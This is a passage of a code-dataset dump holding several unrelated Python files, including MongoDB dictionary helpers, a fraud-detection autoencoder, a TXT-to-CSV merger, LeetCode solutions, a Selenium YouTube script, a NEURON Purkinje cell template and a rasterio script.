pagesize=0)\n    except:\n        raise\n    else:\n        return(result)\n\n\"\"\"\nShared helpers for the stop-word, user-word and invalid-word dictionaries\n\"\"\"\n\nasync def fetchDictItems(dbName, collectionName, xfilter={}, xshown={}, currentpage=1, pagesize=10, returnTotalCount=True):\n    # fetch the rows that match the filter (shared by the dictionary collections)\n    result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n    # print(result1,type(result1))\n    return result1\n\n\nasync def createDictItems(dbName, collectionName, currentpage=1, pagesize=10, ItemInfos={}):\n    # simply use insert_many\n    try:\n        result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n    except:\n        raise\n    else:\n        print('insert succeeded')\n        # fetch all data (first page) and return it\n        # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n        result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n        return (result2)\n\n\nasync def updateDictItems(dbName, collectionName, queryDict={}, setDict={}, pageSize=10, 
currentPage=1):\n try:\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n except:\n raise\n else:\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n\n\nasync def deleteDictItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n result1 = await delete_one(dbName, collectionName, ele)\n if result1:\n pass\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def ItemExist(dbName, collectionName, filter={}):\n return await find_one(dbName, collectionName, filter)\n\n\nasync def check_if_collection_is_empty(dbName, collectionName):\n return await check_collection_count(dbName, collectionName)\n\n\"\"\"\n用户词相关\n\"\"\"\n\n\nasync def deleteUserDictItems(dbName, collectionName, targetCollection, currentpage, pagesize, sourceList=[], targetList=[]):\n if sourceList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for i in range(len(sourceList)):\n result = await insert_one(dbName, targetCollection, data=targetList[i])\n if result != 'project-unknownError':\n result1 = await delete_one(dbName, collectionName, sourceList[i])\n else:\n return ('error')\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def getFieldFromCollection(dbName, collectionName, field, filter={}):\n data = await find_one(dbName, collectionName, filter)\n return json.loads(data)[field] if data else ''\n\n\n# articles related\nasync def createArticleItems(dbName, collectionName, currentpage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except Exception as e:\n raise\n else:\n # if isinstance(result1, int):\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n return (result2)\n\n\nasync def getArticles(dbName, collectionName, xfilter={}, xshown={}, currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 Url表中符合条件的数据\n result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\n\nasync def getArticleBody(dbName, collectionName, xfilter={}, xshown={}, currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 Url表中符合条件的数据\n result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\n\nasync def deleteArticleItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n # print(ele)\n result1 = await delete_one(dbName, collectionName, ele)\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def updateArticleSplitWords(dbName, collectionName, queryDict={}, setDict={}, pageSize=10, currentPage=1):\n # 
print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n print('++++++++++++++', dbName, collectionName,\n setDict, queryDict, pageSize, currentPage)\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n # print('result1',result1)\n if result1 == 1:\n print('插入成功')\n # 获取所有数据(首页) 返回\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n\n else:\n return(result1)\n\n\"\"\"\n用户相关\n\"\"\"\n\n\nasync def fetchUsers(dbName, collectionName, showDict={},currentPage=1, pageSize=1000):\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown=showDict, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n\n\n\"\"\"\nbasicWords related\n\"\"\"\n\n\nasync def addBasicWords(dbName, collectionName, currentPage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except Exception as e:\n raise\n else:\n # if isinstance(result1, int):\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pagesize, returnTotalCount=True)\n return (result2)\n\n\nasync def fetchBasicWords(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 basicWords 表中符合条件的数据\n # print(dbName,collectionName,xfilter,xshown)\n result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, xsort=xsort, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,'ccccccc')\n return result1\n\n\nasync def deleteBacisWordsItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n # print(ele)\n result1 = await delete_one(dbName, collectionName, ele)\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def updateBasicWords(dbName, collectionName, queryDict={}, setDict={}, pageSize=10, currentPage=1):\n # print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n print (dbName, collectionName,\n setDict, queryDict, pageSize, currentPage)\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n # print('result1',result1)\n if result1 == 1:\n print('插入成功')\n # 获取所有数据(首页) 返回\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n else:\n return(result1)\n\n\"\"\"\nextendedWords related\n\"\"\"\n\n\nasync def addExtendedWords(dbName, collectionName, currentPage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except Exception as e:\n raise\n else:\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pagesize, returnTotalCount=True)\n return (result2)\n\n\nasync def fetchExtendedWords(dbName, collectionName, 
idPrefix='',xfilter={}, xshown={}, xsort=[], currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 extendedWords 表中符合条件的数据\n result1 = await fetchTable(dbName, collectionName, idPrefix= idPrefix,xfilter=xfilter, xshown=xshown, xsort=xsort, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\n\nasync def makeAggregations(dbName, collectionName, currentPage=1, pageSize = 10, xaggregate= [],types='topicWord',returnTotalCount=True):\n \"\"\"\n 获取 聚合数据 以及 符合条件的 数据总 数量,类似于 fetchTable\n \"\"\"\n\n # 构造 skip 和 limit\n skip = (currentPage - 1) * pageSize\n limit = pageSize\n\n if types == 'mword':\n # 只要 获取 到 mword,就行了,PVsum avg等职能通过 sub 相加,在前端\n print('xaggregate0000',xaggregate)\n #yxaggregate = []\n #yxaggregate.append({'$match': xaggregate[0]['$match']})\n #yxaggregate.append({'$group': {'_id':xaggregate[1]['$group']['_id']}})\n ## 在 yxaggregate ,中添加 '$count' 算子,\n #yxaggregate.append({'$count': 'totalCount'})\n result1 = list(await aggregate(dbName, collectionName, aggregation=xaggregate))\n\n # 添加 ID\n initID = 1\n for ele in result1:\n ele['word'] = ele.pop('_id')[types]\n ele['id'] = skip+ initID\n ele['_loading']= False\n ele['children'] = []\n initID += 1\n print('result1',result1)\n return {'count': len(result1),'content':result1}\n\n if returnTotalCount:\n # 1 读取所有项目数目,首先构建 ,只查询项目 数目的 查询表达式\n yxaggregate = []\n print('xaggregatemmm',xaggregate)\n if xaggregate[0]['$match']:\n yxaggregate.append({'$match': xaggregate[0]['$match']})\n if xaggregate[1].get('$group') and xaggregate[1].get('$group').get('_id'):\n yxaggregate.append({'$group': {'_id':xaggregate[1]['$group']['_id']}})\n\n # 在 yxaggregate ,中添加 '$count' 算子,\n yxaggregate.append({'$count': 'totalCount'})\n print('yxaggregate',yxaggregate)\n result1 = list(await aggregate(dbName, collectionName, aggregation=yxaggregate))\n \n if len(result1) == 0:\n #返回0, 并退出\n return ({'count': 0, 'content': []})\n else:\n result1 = result1[0]['totalCount']\n # 此处 result1 肯定是个数字, 0 或者 >0\n else:\n result1 = ''\n print('result1vvv',result1)\n # 2 读取所有的表信息\n result2 = []\n if (type(result1) == int and result1 > 0) or result1 == '':\n # 1-1: 存在数据,则继续下一步 1-2: 没有计算长度 ,也进入下一步。 否则,直接返回空\n\n # xaggregate.append({'$skip': skip}) # 获取全部数据,不需要分页\n # xaggregate.append({'$limit': limit})\n \n print('xaggregate',xaggregate)\n result2 = list(await aggregate(dbName, collectionName, aggregation=xaggregate))\n print('hello',result2) \n return (json.loads(json_util.dumps({'count': result1, 'content': result2})))\n\n\nasync def fetchExtendedWordsTopic(dbName, collectionName, currentPage=1, pageSize = 10,xaggregate =[],returnTotalCount=True):\n # 获取 特定项目 extendedWords 表中符合条件的 主题词 聚合 数据 \n result1 = await makeAggregations (dbName, collectionName, currentPage=currentPage, pageSize = pageSize, xaggregate=xaggregate, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\nasync def fetchExtendedWordsInherit(dbName, collectionName, currentPage=1,pageSize = 10, xaggregate =[],returnTotalCount=True):\n # 获取 特定项目 extendedWords 表中符合条件的 主题词 聚合 数据\n result1 = await makeAggregations (dbName, collectionName, currentPage=currentPage, types='mword',pageSize = pageSize, xaggregate=xaggregate, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\nasync def deleteExtendedWordsItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n # print(ele)\n result1 = await 
delete_one(dbName, collectionName, ele)\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def updateExtendedWords(dbName, collectionName, updateType='one',queryDict={}, setDict={}, pageSize=10, currentPage=1):\n # print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n print('++++++++++++++', dbName, collectionName,\n setDict, queryDict, pageSize, currentPage)\n if updateType == 'many':\n result1 = await update_many(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n else:\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n #result1 = await update_many(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n print('result1',result1)\n if result1 >= 1:\n print('插入成功')\n # 获取所有数据(首页) 返回\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n else:\n return(result1)\n\n'''\n标签云相关\n'''\n\n\nasync def fetchUsageTags(dbName, collectionName):\n usageTags = await find(dbName, collectionName)\n return usageTags\n\n\nif __name__ == '__main__':\n update_one('KWM-5f5c4240e0c234a92a524a36', 'StopDict', {'_id': '5f5cdc64041c89a528d10776'}, {\n '$set': {'word': '测试qweqweqweqwe', 'modifiedTime': '2020-09-12 22:49:27'}})\n","sub_path":"kms-docker/kms-image/kms/database/db_advanced.py","file_name":"db_advanced.py","file_ext":"py","file_size_in_byte":28158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"545817816","text":"### Ref Materials\r\n## Data source : https://www.kaggle.com/mlg-ulb/creditcardfraud/data\r\n## This contain data set contain 492 frauds and 284,315 Normal transactions\r\n## Data highly imbalance due to that we are using Deep Autoencorder for creating model\r\n## Ref webpages & materials :\r\n## 1) https://shiring.github.io/machine_learning/2017/05/01/fraud\r\n## 2) https://blog.keras.io/building-autoencoders-in-keras.html\r\n## 3) https://towardsdatascience.com/applied-deep-learning-part-3-autoencoders-1c083af4d798\r\n## 4) https://medium.com/@curiousily/credit-card-fraud-detection-using-autoencoders-in-keras-tensorflow-for-hackers-part-vii-20e0c85301bd\r\n## 5) https://elitedatascience.com/keras-tutorial-deep-learning-in-python\r\n## 6) http://thesai.org/Downloads/Volume9No1/Paper_3-Credit_Card_Fraud_Detection_Using_Deep_Learning.pdf\r\n## 7) https://en.wikipedia.org/wiki/Autoencoder\r\n## 8) https://www.analyticsvidhya.com/blog/2016/01/12-pandas-techniques-python-data-manipulation/\r\n## 9) https://github.com/otenim/AnomalyDetectionUsingAutoencoder\r\n## 10) http://mail.tku.edu.tw/myday/teaching/1042/SCBDA/1042SCBDA09_Social_Computing_and_Big_Data_Analytics.pdf\r\n## 11) https://machinelearningmastery.com/binary-classification-tutorial-with-the-keras-deep-learning-library/\r\n## 12) https://machinelearningmastery.com/tutorial-first-neural-network-python-keras/\r\n\r\n\r\n## Importing libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import Model\r\nfrom keras.layers import Input, Dense\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n#Importing csv file\r\ndf = pd.read_csv(\"./creditcard.csv\")\r\nprint('Null values :',df.isnull().values.any()) ## Checking whether data set contains any null 
values\r\nprint(df.describe()) ## Describe the data set\r\nprint('Import dataframe shape',df.shape) ## dataframe size\r\nprint(df.head(2)) ## first 2 rows of the data frame\r\nprint('***********************')\r\n\r\n# creating two days and tagging them\r\ndf['day'] = np.where(df['Time']<86401, 'day1', 'day2')\r\ndf['Status'] = np.where(df['Class']==0, 'N', 'Y') # Adding new column and decoding class\r\nprint('***********************')\r\nprint(df.head(2)) ## first 2 rows of the data frame\r\n\r\n# Creating graphs to check fraud transactions & normal transactions\r\nplt.show(sns.lmplot(x='Time',y='Amount',data=df[df.day=='day1'],hue='Status')) # Day 1 Normal Vs Fraud transactions\r\nplt.show(sns.lmplot(x='Time',y='Amount',data=df[df.day=='day2'],hue='Status')) # Day 2 Normal Vs Fraud transactions\r\n#plt.show(sns.pairplot(df[df.day=='day1'], kind=\"scatter\",hue='Status'))\r\n#plt.show(sns.pairplot(df[df.day=='day2'], kind=\"scatter\",hue='Status'))\r\n\r\n## showing the anomaly\r\nplt.show(df.pivot_table(values=[\"Class\"],index=[\"Status\"],aggfunc='count').plot(kind='bar')) # Fraud Vs Normal\r\nplt.show(df.pivot_table(values=[\"Class\"],index=[\"day\",\"Status\"],aggfunc='count').plot(kind='bar')) # Fraud Vs Normal daily\r\n\r\nprint('***********************')\r\nprint(df.pivot_table(values=[\"Class\"],index=[\"Status\"],aggfunc='count')) # Fraud Vs Normal - pivot\r\nprint(df.pivot_table(values=[\"Class\"],index=[\"day\",\"Status\"],aggfunc='count')) # Fraud Vs Normal daily - pivot\r\n\r\n## Applying autoencoders\r\nprint('***********************')\r\ndata = df.drop(['Time','day','Status'], axis=1) # Removing unwanted columns\r\nprint(data.shape)\r\n\r\n## Scaling data\r\nprint('***********************')\r\nscaler = MinMaxScaler(feature_range=(0, 1))\r\ndata['Amount'] = scaler.fit_transform(data['Amount'].values.reshape(-1, 1))\r\nprint(data.Amount.describe())\r\nprint('*********************')\r\n\r\n# Data partition into train & test sets: 70% to train & 30% to test\r\nX_train, X_test = train_test_split(data, test_size=0.3, random_state=100)\r\nprint('x train',X_train.shape) ## train data set\r\nprint('x test',X_test.shape) ## test data set\r\n\r\nX_train = X_train[X_train.Class == 0] ## selecting only Normal transactions for training the autoencoder\r\nX_train = X_train.drop(['Class'], axis=1) ## removing class variable\r\ny_test = X_test['Class'] ## Test data\r\nX_test = X_test.drop(['Class'], axis=1) # Remove Class variable to test the data\r\nX_train = X_train.values\r\nX_test = X_test.values\r\nprint('x train',X_train.shape)\r\nprint('x train features',X_train.shape[1])\r\n\r\n## Deep Autoencoder\r\ninput_l=Input(shape=(29,))\r\n## Encode\r\nencoded=Dense(25,activation='relu')(input_l)\r\nencoded=Dense(20,activation='relu')(encoded)\r\nencoded=Dense(10,activation='relu')(encoded)\r\nencoded=Dense(5,activation='relu')(encoded)\r\n## Decode\r\ndecoded=Dense(10,activation='relu')(encoded)\r\ndecoded=Dense(20,activation='relu')(decoded)\r\ndecoded=Dense(25,activation='relu')(decoded)\r\ndecoded=Dense(29,activation='relu')(decoded)\r\n\r\nautoencorder=Model(inputs=input_l,outputs=decoded)\r\nautoencorder.compile(optimizer='adam', loss='binary_crossentropy')\r\n\r\nautoencorder.fit(X_train, X_train,\r\n                epochs=200,\r\n                batch_size=10000,\r\n                shuffle=True,\r\n                validation_data=(X_test, X_test))\r\n\r\n## Predict the result for test data set\r\npredictions=autoencorder.predict(X_test)\r\n\r\n## Error\r\nmse = np.mean(np.power(X_test - predictions, 2), axis=1)\r\nerror_df = pd.DataFrame({'reconstruction_error': mse,'true_class': y_test})\r\n\r\n## Confusion Matrix\r\n## use 2.6 as the threshold\r\nprint(error_df.head(2))\r\nprint('************************')\r\nerror_df['y_pred'] = np.where(error_df['reconstruction_error']>2.6, '1', '0')\r\nprint(pd.crosstab(error_df['true_class'], error_df['y_pred']))\r\n","sub_path":"CrCrdFraudGitHub.py","file_name":"CrCrdFraudGitHub.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"637515930","text":"'''\r\nGo to the folder old_Path,\r\nmerge the text files inside it,\r\nand save the result to the target path\r\n'''\r\n# get today's date\r\ndef get_Today():\r\n    import time\r\n    global today\r\n    \r\n    localtime = time.localtime()\r\n    today = time.strftime(\"%Y-%m-%d\", localtime) \r\n    return today\r\n\r\n# merge all TXT files under the old path --> <date>.txt\r\ndef merge_oldPath_txt():\r\n    import os\r\n    import os.path\r\n    global txt_new_Path,new_Path # expose the path of the merged txt for today\r\n    \r\n    pwd = os.getcwd() # current working directory\r\n    print(\"Current path --> \"+pwd)\r\n    old_Path=pwd+\"\\\\old_Path\" # folder holding the TXT files before merging\r\n    new_Path=pwd+\"\\\\new_Path\" # folder for the merged TXT file\r\n    print(\"Folder of .txt files before merging --> \" + old_Path)\r\n    print(\"Folder for the merged .txt --> \" + new_Path)\r\n    \r\n    # build the target path, named after today's date\r\n    txt_new_Path = new_Path+'\\\\'+today+'.txt'\r\n    print(\"Merged file name --> \"+txt_new_Path)\r\n\r\n    # list the files in the source folder and print them\r\n    filelist = os.listdir(old_Path)\r\n    print(\"------------ file list inside old_Path ------------\")\r\n    print(filelist)\r\n\r\n    # merge the files into the dated output file\r\n    print(\"------------ merging TXT contents --> saving to the new path ------------\")\r\n    with open(txt_new_Path, 'w', encoding='utf-8') as f:\r\n        # build the full path of every file\r\n        for filename in filelist:\r\n            filepath = old_Path + '\\\\' + filename\r\n            # write line by line\r\n            for line in open(filepath):\r\n                f.writelines(line)\r\n            f.write('\\n')\r\n    txt=\"Merging finished --> \"+old_Path,\"saved at --> \"+txt_new_Path\r\n    return txt\r\n\r\n# convert the merged TXT into CSV\r\ndef mergeTXT_to_CSV():\r\n    import numpy as np\r\n    import pandas as pd\r\n    \r\n    # path of the merged TXT file\r\n    txt = np.genfromtxt(txt_new_Path,dtype='str')\r\n    print(txt)\r\n    \r\n    txtDF = pd.DataFrame(txt)\r\n    #print(txtDF)\r\n    # build the CSV output path\r\n    csv_new_Path = new_Path +'\\\\'+today+'.csv'\r\n    txtDF.to_csv(csv_new_Path,index=False) \r\n    txt=\"TXT converted to CSV, stored at --> \" + csv_new_Path\r\n    return txt\r\n\r\nget_Today()\r\nprint(merge_oldPath_txt())\r\nprint(mergeTXT_to_CSV())","sub_path":"mergeTXTtoCSV/mergeTXT_to_CSV.py","file_name":"mergeTXT_to_CSV.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"221999873","text":"from typing import List\nfrom itertools import permutations\n\n\nclass Solution:\n    def permutation(self, S: str) -> List[str]:\n\n        # return list({\"\".join(cs) for cs in permutations(S, len(S))})\n\n        ans = []\n        S = sorted(S)\n\n        def backtrack(r, s):\n            if not len(s):\n                ans.append(r)\n            else:\n                pre = ''\n                for i in range(len(s)):\n                    if s[i] != pre:\n                        backtrack(r + s[i], s[:i] + s[i + 1:])\n                        pre = s[i]\n\n        backtrack('', S)\n        return ans\n","sub_path":"cxy/NO08.08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"435908433","text":"from selenium import webdriver\r\nimport time\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\nclass OpenYoutube():\r\n    def YoutubeTest(self):\r\n        # chrome\r\n        #chrome_path = \"C:\\\\Users\\\\soumya.patil\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37-32\\\\Drivers\\\\chromedriver.exe\"\r\n        #driver = webdriver.Chrome(chrome_path)\r\n        \r\n        # Firefox\r\n        driver = webdriver.Firefox(executable_path=r'C:\\Users\\soumya.patil\\AppData\\Local\\Programs\\Python\\Python37-32\\Drivers\\geckodriver.exe')\r\n        driver.maximize_window()\r\n        driver.implicitly_wait(10)\r\n        driver.get(\"https://www.youtube.com\")\r\n        \r\n        # click on the search box\r\n        searchTextBox = driver.find_element_by_name(\"search_query\")\r\n        searchTextBox.click()\r\n        \r\n        searchTextBox1 = driver.find_element_by_name(\"search_query\")\r\n        searchTextBox1.send_keys('Peppa pig')\r\n        \r\n        searchButton = driver.find_element_by_id(\"search-icon-legacy\")\r\n        searchButton.click()\r\n        \r\n        time.sleep(3)\r\n        # open the first search result so that the player element exists on the page\r\n        SelectVideo = driver.find_element_by_id(\"video-title\")\r\n        SelectVideo.click()\r\n        time.sleep(3)\r\n        # driver.getElementById() is not part of the Selenium Python API; locate the element instead\r\n        youtubePlayer = driver.find_element_by_id(\"movie_player\")\r\n        # YouTube's HTML5 player exposes getPlayerState() on the element itself, so call it via JavaScript\r\n        playerState = driver.execute_script(\"return arguments[0].getPlayerState();\", youtubePlayer)\r\n        print(playerState)\r\n\r\nOY = OpenYoutube()\r\nOY.YoutubeTest()","sub_path":"SeleniumTest/Youtube.py","file_name":"Youtube.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"321447508","text":"# Definition for a point.\n# class Point:\n#     def __init__(self, a=0, b=0):\n#         self.x = a\n#         self.y = b\nclass UnionFind:\n    def __init__(self, m, n):\n        self.father = {}\n        for i in range(n):\n            for j in range(m):\n                id = self.converttoId(i,j,m);\n                self.father[id] = id\n\n    def converttoId(self, x, y, m):\n        return x*m + y\n    \n    def find(self, x):\n        parent = self.father[x]\n        while parent != self.father[parent]:\n            parent = self.father[parent]\n        return parent\n    \n    def compressed_find(self, x):\n        parent = self.father[x]\n        while parent != self.father[parent]:\n            parent = self.father[parent]\n\n        temp = -1;\n        fa = self.father[x]\n        while fa != self.father[fa]:\n            temp = self.father[fa]\n            self.father[fa] = parent\n            fa = temp\n\n        return parent\n\n    \n    def union(self, x, y):\n        fa_x = self.find(x)\n        fa_y = self.find(y)\n        if fa_x != fa_y:\n            self.father[fa_x] = fa_y\n    \nclass Solution:\n    # @param {int} n an integer\n    # @param {int} m an integer\n    # @param {Point[]} operators an array of points\n    # @return {int[]} an integer array\n    def numIslands2(self, n, m, operators):\n        dx = [0,-1, 0, 1]\n        dy = [1, 0, -1, 0]\n        island = [[0 for i in range(m)] for j in range(n)]\n        ans = []\n        uf = UnionFind(n, m)\n        count = 0\n        if operators is not None:\n            for i in range(len(operators)):\n                x = operators[i].x\n                y = operators[i].y\n                if island[x][y] != 1:\n                    # only a newly added land cell can change the island count\n                    count += 1\n                    island[x][y] = 1\n                    id = uf.converttoId(x, y, m)\n                    # examine the four neighbouring cells (up, down, left, right)\n                    for j in range(4):\n                        nx = x + dx[j]\n                        ny = y + dy[j]\n                        if 0 <= nx and nx < n and 0 <= ny and ny < m and island[nx][ny] == 1:\n                            nid = uf.converttoId(nx, ny, m)\n                            fa = uf.find(id)\n                            nfa = uf.find(nid)\n                            if fa != nfa:\n                                count -= 1\n                                uf.union(id, nid)\n\n                ans.append(count)\n        return ans","sub_path":"LeetCode/Number_of_Islands_II.py","file_name":"Number_of_Islands_II.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"383807600","text":"\n\ndef get_keywords_by_label(connect):\n    labels_keywords_map = {}\n    cursor = connect.cursor()\n    # fetch the job categories (labels)\n    cursor.execute(\"SELECT ID FROM LABELS\")\n    label_ids = cursor.fetchall()\n\n    for label_id in label_ids:\n        cursor.execute(\"SELECT KEYWORD FROM KEYWORDS WHERE LABEL_ID = %s\", label_id[0])\n        keywords = 
cursor.fetchall()\n keyword_map = {label_id: keywords}\n labels_keywords_map.update(keyword_map)\n\n connect.commit()\n return labels_keywords_map\n","sub_path":"Category.py","file_name":"Category.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129251957","text":"#AutomationDebug.py\n#Example of Year 2019: Subsets 2, 3, 4\n#Applied to csv files with dtypes as objects and \n#further used by converting the required to floats and performing operations\n\nimport pandas as pd\n\nmy_df = pd.read_csv(\"Main_9.12.03.b_subset_4.csv\", encoding = \"latin-1\")\n\nmy_df['POSITIVE'] = pd.to_numeric(my_df['POSITIVE'] , errors = 'coerce')\nmy_df['NEGATIVE'] = pd.to_numeric(my_df['NEGATIVE'] , errors = 'coerce')\n\nmy_df = my_df.loc[my_df['QUESTION'] == 'Q44']\nmy_df = my_df.loc[my_df['SURVEYR'] == 2019]\nmy_df = my_df.iloc[0:,[20, 22]]\n\nprint (my_df)\n\ncount = my_df['POSITIVE'].count()\nprint ('Count: ' + str(count))\ncount = count.astype('float')\n\nmy_df.sum()[\"POSITIVE\"]\nmy_df.sum()[\"NEGATIVE\"]\n\naverage_mpln = my_df.sum()[\"POSITIVE\"] / count\naverage_mnlp = my_df.sum()[\"NEGATIVE\"] / count\n\nprint ('Average for POSITIVE: ' + str(average_mpln))\nprint ('Average for NEGATIVE: ' + str(average_mnlp))\n","sub_path":"python files/.ipynb_checkpoints/AutomationDebug-checkpoint.py","file_name":"AutomationDebug-checkpoint.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165358790","text":"#Template of the Purkinje cell model, Mike Hausser (version 3, 20.2.97)\n#Templating by Lungsi 2019 based on ~/PC1997bHausser/P19.hoc\n#This template was sourced from Vetter et al. 2001 Dendritica ModelDB\nfrom neuron import h\n#from pdb import set_trace as breakpoint\n\nclass Purkinje(object):\n \"\"\"Multi-compartment cell\n \"\"\"\n def __init__(self):\n h.xopen(\"P20.hoc\")\n\n # The following are chosen as attributes for potential recording\n self.soma = h.soma\n self.dend_root = h.dendA1_0 # see Fig.2A Zang et al. 2018 10.1016/j.celrep.2018.07.011\n # Zang et al. 
2018 used a modified version of this.\n # This model has smooth and spiny dendrites such that the\n # sparsely spiny dendrite sections are assumed to be likely innervated\n # by the climbing fibre.\n # However, since the cell is the main region of interest\n # PC1997aHausser is in ~/models/cells/ NOT in ~/models/synapses\n\n # no explicit dt is known to be given so use the default = 0.025\n","sub_path":"models/cells/PC1997bHausser/Purkinje.py","file_name":"Purkinje.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468908368","text":"import rasterio as rt\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom rasterio.plot import show\nfrom rasterio.plot import show\nfrom rasterio.mask import mask\nfrom fiona.crs import from_epsg\nimport pycrs\n\n# Index coefficients\nL = 1 \nC1 = 6\nC2 = 7.5\nG = 2.5\n#datasets names\ndatasets = ('20191207','20191217','20200425','20200106') \namount = len(datasets)\ndef read():\n\tglobal 